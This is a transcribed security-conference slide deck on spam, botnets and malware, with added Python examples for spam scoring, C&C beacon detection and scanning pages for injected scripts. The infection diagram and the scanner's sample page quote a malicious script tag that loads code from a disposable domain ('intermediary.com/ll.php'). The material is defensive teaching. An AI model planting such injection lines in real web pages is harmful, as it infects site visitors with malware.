SPAM/BOTNETS and Malware
Neil Warner, CIO, GoDaddy.com
Moderator: Dan Kaplan, deputy editor, SC Magazine
We Put Up Walls
Modern Day Fort
How do you Detect SPAM Mails?
– Key words
– Heuristics/Abnormal behavior
What can you do to defend against it?
– SPAM Filters
– Reputation services to block traffic from those spamming IP addresses
– Take down the root cause
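The three signals the slide names (keyword matches, behavioural heuristics, sender-IP reputation) combined into one small scorer, as an added example that is not part of the original deck. The keyword weights, the blocklist (a TEST-NET-3 address standing in for a reputation service) and the three sample messages are all constructed for the demonstration.

```python
"""Added example (not from the slides): score a message with keyword matches,
abnormal-behaviour heuristics and a sender-IP reputation check.
Keyword weights, the blocklist and the sample messages are constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed keyword weights; a production filter learns these from labelled mail.
KEYWORD_WEIGHTS = {"free": 1.0, "winner": 2.0, "click here": 1.5, "act now": 1.5}

# Constructed stand-in for a reputation service (TEST-NET-3 address).
BLOCKLISTED_IPS = {"203.0.113.7"}

SPAM_THRESHOLD = 4.0
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
RAW_IP_URL_RE = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")


@dataclass
class Message:
    sender_ip: str
    subject: str
    body: str


def keyword_score(text: str) -> float:
    """Sum the weights of every keyword that appears (case-insensitive)."""
    lowered = text.lower()
    return sum(w for kw, w in KEYWORD_WEIGHTS.items() if kw in lowered)


def heuristic_score(msg: Message) -> tuple[float, list[str]]:
    """Abnormal-behaviour checks: shouting subject, link-heavy body, links to raw IPs."""
    score, reasons = 0.0, []
    letters = [c for c in msg.subject if c.isalpha()]
    if letters and sum(c.isupper() for c in letters) / len(letters) > 0.6:
        score += 1.0
        reasons.append("mostly-uppercase subject")
    urls = URL_RE.findall(msg.body)
    if len(urls) >= 3:
        score += 1.5
        reasons.append("link-heavy body")
    if any(RAW_IP_URL_RE.match(u) for u in urls):
        score += 1.5
        reasons.append("link to raw IP address")
    return score, reasons


def classify(msg: Message) -> dict:
    """Reputation first (cheapest, can reject at connection time), then content scoring."""
    if msg.sender_ip in BLOCKLISTED_IPS:
        return {"verdict": "blocked", "score": None,
                "reasons": ["sender IP on reputation blocklist"]}
    kw = keyword_score(msg.subject + " " + msg.body)
    heur, reasons = heuristic_score(msg)
    if kw:
        reasons.append(f"keyword score {kw}")
    total = kw + heur
    verdict = "spam" if total >= SPAM_THRESHOLD else "ham"
    return {"verdict": verdict, "score": total, "reasons": reasons}


# Constructed sample messages.
HAM = Message("192.0.2.10", "Lunch on Thursday?",
              "Hi, are you free for lunch on Thursday? The usual place.")
SPAM = Message("198.51.100.9", "YOU ARE A WINNER - ACT NOW",
               "Click here http://203.0.113.55/claim to get your FREE prize. "
               "More: http://a.example/x http://b.example/y")
BLOCKED = Message("203.0.113.7", "Hello", "Plain text from a listed sender.")

if __name__ == "__main__":
    for m in (HAM, SPAM, BLOCKED):
        print(m.subject, "->", classify(m))
```

The reputation check runs before any content parsing because it is the cheapest signal and the one a mail gateway can apply at SMTP connection time; keyword and heuristic scores only matter for senders that pass it.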
War Against SPAM
SPAM – share by source country
US 34%
CN 16%
RU 12%
UK 7%
AR 7%
BR 6%
FR 5%
ES 5%
RO 4%
DE 4%
What are Botnets used for? How do we detect them? How can we defend against it?
Botnet lifecycle
– Bot-herder configures initial bot parameters such as infection vectors, payload, stealth, C&C details
– Register a DDNS
– Register a static IP
– Bot-herder launches or seeds new bot(s)
– Bots spread
– Causes an increase of DDoS being sent to the victim
– Losing bots to rival botnets
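One answer to the slide's "How do we detect them?" is to look for the polling pattern a bot produces when it checks in with its C&C: many connections from one host to one destination at near-constant intervals. The following is an added example, not part of the original deck; the connection log is constructed (one infected host beaconing every ~300 s, one normal host browsing irregularly) and the line format is an assumption.

```python
"""Added example (not from the slides): flag (src, dst) pairs whose connection
intervals are nearly constant, the beaconing behaviour of a bot polling its C&C.
The log lines and their format are constructed for the demonstration."""
from __future__ import annotations

import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

LINE_RE = re.compile(r"^(\S+) (\S+) -> (\S+)$")  # "timestamp src -> dst:port"


def _make_log(base: datetime, src: str, dst: str, intervals: list[int]) -> list[str]:
    """Build constructed log lines: one connection at base, then one after each gap."""
    t, lines = base, [f"{base.isoformat()} {src} -> {dst}"]
    for gap in intervals:
        t += timedelta(seconds=gap)
        lines.append(f"{t.isoformat()} {src} -> {dst}")
    return lines


BASE = datetime(2010, 3, 1, 8, 0, 0)
# Constructed: an infected host polls every ~300 s; a normal host browses irregularly.
CONSTRUCTED_LOG = (
    _make_log(BASE, "10.0.0.5", "198.51.100.20:443", [300, 301, 299, 300, 302, 298, 300])
    + _make_log(BASE, "10.0.0.7", "192.0.2.80:443", [45, 355, 10, 1490, 100, 600])
)


def find_beacons(lines: list[str], min_conns: int = 6, max_cv: float = 0.15) -> list[dict]:
    """Group connections per (src, dst); a low coefficient of variation of the
    inter-connection gaps over enough connections is reported as a beacon."""
    times: dict[tuple[str, str], list[datetime]] = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the whole scan
        ts, src, dst = m.groups()
        times[(src, dst)].append(datetime.fromisoformat(ts))

    findings = []
    for (src, dst), stamps in times.items():
        if len(stamps) < min_conns:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.fmean(gaps)
        if mean <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean
        if cv <= max_cv:
            findings.append({"src": src, "dst": dst, "count": len(stamps),
                             "mean_interval": mean, "cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for finding in find_beacons(CONSTRUCTED_LOG):
        print(finding)
```

The thresholds (`min_conns`, `max_cv`) are tuning knobs: software updaters and monitoring agents also beacon, so in practice the flagged pairs are joined against an allowlist of known agents and against destination reputation (the trackers listed at the end of the deck) before anyone is paged.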
Bot Army
Botnets – share by country
US 53%
RU 8%
DE 8%
UK 7%
FR 6%
UA 6%
NL 5%
CA 3%
SE 2%
ES 2%
Different types of Malware
Broad Category
– Trojans, Rootkits, Backdoors
Malware for Fun and Profit
– Spyware, Key loggers, Dialers, Bots, Proxies, SEO etc.
Grayware
Camouflaged Attacks
Top 10 Malware Countries
US 45%
CN 11%
RU 9%
DE 8%
NL 6%
UA 6%
UK 4%
KR 3%
CA 3%
CZ 3%
Threat Landscape - Brute Force
Threat Landscape - FTP
Threat Landscape - SSH
Threat Landscape - Conficker
Threat Landscape - Slammer
Threat Landscape - Fake Search Agents
Threat Landscape - e107 bot
How Does Malware Happen
(Diagram; labels recovered from the slide:)
– Compromised Attack Server(s)
– FTP/SSH Upload of Attack Shell/Script
– Servers with Compromised Accounts (Zeus/Phishing/etc)
– Injected into the site: <script>http://intermediary.com/ll.php</script>
– Casual Web User Visits Infected Site
– GET http://intermediary.com/ll.php (Disposable Domain Name)
– Make HTTP calls to infection script and site is infected
– End Users
– Fake AV: <html>Holy Crap! Infected! Click Here to clean</html>
– $$$$$$
0 Day vulnerability in a web application or Web Server
– Compromises the web sites
– Redirects the end user to a malware site or competitors website.
– Example: Fake AV Campaign
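The diagram's pivot is the tag injected into a compromised site that pulls a loader from a disposable third-party domain. A site owner can catch that class of change by scanning served pages for script or iframe sources whose host is not one of the site's own. The code below is an added example, not from the deck; the first-party host list and the sample page are constructed, and intermediary.com/ll.php is reused from the slide's own diagram as the injected URL.

```python
"""Added example (not from the slides): scan a page for script/iframe loads that
point off-site, the injection pattern in the slide's diagram. The sample page and
the first-party host list are constructed."""
from __future__ import annotations

import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


class InjectionScanner(HTMLParser):
    """Collect external script/iframe sources and URLs embedded in inline scripts."""

    def __init__(self, first_party_hosts: set[str]):
        super().__init__()
        self.first_party = first_party_hosts
        self.findings: list[dict] = []
        self._in_script = False

    def _check(self, kind: str, url: str) -> None:
        host = urlsplit(url).hostname
        # Relative URLs have no host and are served by the site itself.
        if host and host not in self.first_party:
            self.findings.append({"kind": kind, "host": host, "url": url})

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "script":
            self._in_script = True
            if attrs.get("src"):
                self._check("script-src", attrs["src"])
        elif tag == "iframe" and attrs.get("src"):
            self._check("iframe-src", attrs["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Loaders are often written as inline JS that creates a <script> element.
        if self._in_script:
            for url in URL_RE.findall(data):
                self._check("inline-script-url", url)


def scan_html(page: str, first_party_hosts: set[str]) -> list[dict]:
    """Return every off-site load found in the page, empty if the page is clean."""
    scanner = InjectionScanner(first_party_hosts)
    scanner.feed(page)
    scanner.close()
    return scanner.findings


FIRST_PARTY_HOSTS = {"www.example-shop.test", "cdn.example-shop.test"}  # constructed

# Constructed page: two legitimate scripts, the injected loader (as a src attribute
# and as inline JS) and a zero-size iframe pointing at the same disposable domain.
SAMPLE_PAGE = """<html><head>
<script src="/js/app.js"></script>
<script src="https://cdn.example-shop.test/lib.js"></script>
<script src="http://intermediary.com/ll.php"></script>
<script>var s=document.createElement('script');s.src='http://intermediary.com/ll.php';document.body.appendChild(s);</script>
</head><body>
<iframe src="http://intermediary.com/frame.html" width="0" height="0"></iframe>
<p>Welcome to the shop.</p>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE, FIRST_PARTY_HOSTS):
        print(finding)
```

Run against a fresh fetch of each page (or a stored copy compared with the one on disk), the scan turns a silent defacement into an alert; pairing it with file-integrity monitoring on the web root catches the FTP/SSH upload step of the diagram before the injected tag is ever served.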
Fake AV
What Can We Do?
Network/Application Security tools
– Firewalls
– Intrusion Prevention Systems
– Intrusion Detection Systems
– Web Application Firewalls
– Network Access Controls
– Antivirus
– Reputation based Access
– Code Audits
The Most Important Deterrent
Security Professionals
Is The Internet Worth IT?
Thank You | Q&A
Neil Warner, CIO [email protected]
References
– https://zeustracker.abuse.ch/
– http://www.malwaredomainlist.com/
– http://www.phishtank.com/
– http://www.clean-mx.de/
– http://en.wikipedia.org/wiki/Botnet
– http://en.wikipedia.org/wiki/Malware